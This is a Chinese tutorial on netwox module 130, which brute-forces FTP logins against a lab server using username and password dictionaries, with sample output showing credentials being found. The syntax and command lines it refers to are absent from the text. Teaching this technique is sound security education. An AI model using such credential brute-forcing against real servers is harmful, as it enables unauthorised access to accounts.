登录 FTP 服务器需要正确的用户名和密码。如果不知道用户名和密码,就无法登录。
netwox 工具提供了编号为 130 的模块,它可以对 FTP 服务器的用户名和密码实施暴力破解。它使用用户名和密码字典进行匹配,猜测正确的登录用户名和密码。
其语法格式如下:
其中,-i 选项指定 FTP 服务器的 IP 地址;-l 选项指定用户名字典文件,-w 选项指定密码字典文件。
【实例】已知 FTP 服务器的 IP 地址为 192.168.59.135。现有一个用户名字典文件 user.txt,一个密码字典文件 password.txt。使用这两个字典文件,暴力破解FTP服务器的用户名和密码。
输出信息如下:
Trying(thread1) "admin" - "root" Trying(thread2) "admin" - "linux" Trying(thread3) "admin" - "123abc" Trying(thread4) "admin" - "123" Trying(thread5) "root" - "root" Couple(thread1) "admin" - "root" -> bad Trying(thread1) "root" - "linux" Couple(thread2) "admin" - "linux" -> bad Trying(thread2) "root" - "123abc" Couple(thread3) "admin" - "123abc" -> bad Trying(thread3) "root" - "123" Couple(thread4) "admin" - "123" -> bad Trying(thread4) "sm" - "root" Couple(thread5) "root" - "root" -> bad Trying(thread5) "sm" - "linux" Couple(thread3) "root" - "123" -> bad Trying(thread3) "sm" - "123abc" Couple(thread1) "root" - "linux" -> bad Trying(thread1) "sm" - "123" Couple(thread5) "sm" - "linux" -> bad Trying(thread5) "" - "root" Couple(thread2) "root" - "123abc" -> bad Trying(thread2) "" - "linux" Couple(thread4) "sm" - "root" -> bad Trying(thread4) "" - "123abc" Couple(thread1) "sm" - "123" -> good Trying(thread1) "" - "123" Couple(thread2) "" - "linux" -> bad Couple(thread3) "sm" - "123abc" -> bad Couple(thread5) "" - "root" -> bad Couple(thread4) "" - "123abc" -> bad Couple(thread1) "" - "123" -> bad
以上输出信息显示了暴力破解的整个过程。它将用户名字典文件 user.txt 中的每一个用户名与密码字典文件 password.txt 中的所有密码进行配对使用。
如果登录成功,显示为 good;否则,显示为 bad。当使用用户名 sm 与密码 123 进行登录时,显示为 good,表示 FTP 服务器登录的用户名为 sm,密码为 123。
如果用户知道用户名而不知道密码,可以直接使用用户名,指定密码字典即可。执行命令如下:
输出信息如下:
Trying(thread1) "sm" - "root" Trying(thread2) "sm" - "linux" Trying(thread3) "sm" - "123abc" Trying(thread4) "sm" - "123" Couple(thread1) "sm" - "root" -> bad Couple(thread2) "sm" - "linux" -> bad Couple(thread3) "sm" - "123abc" -> bad Couple(thread4) "sm" - "123" -> good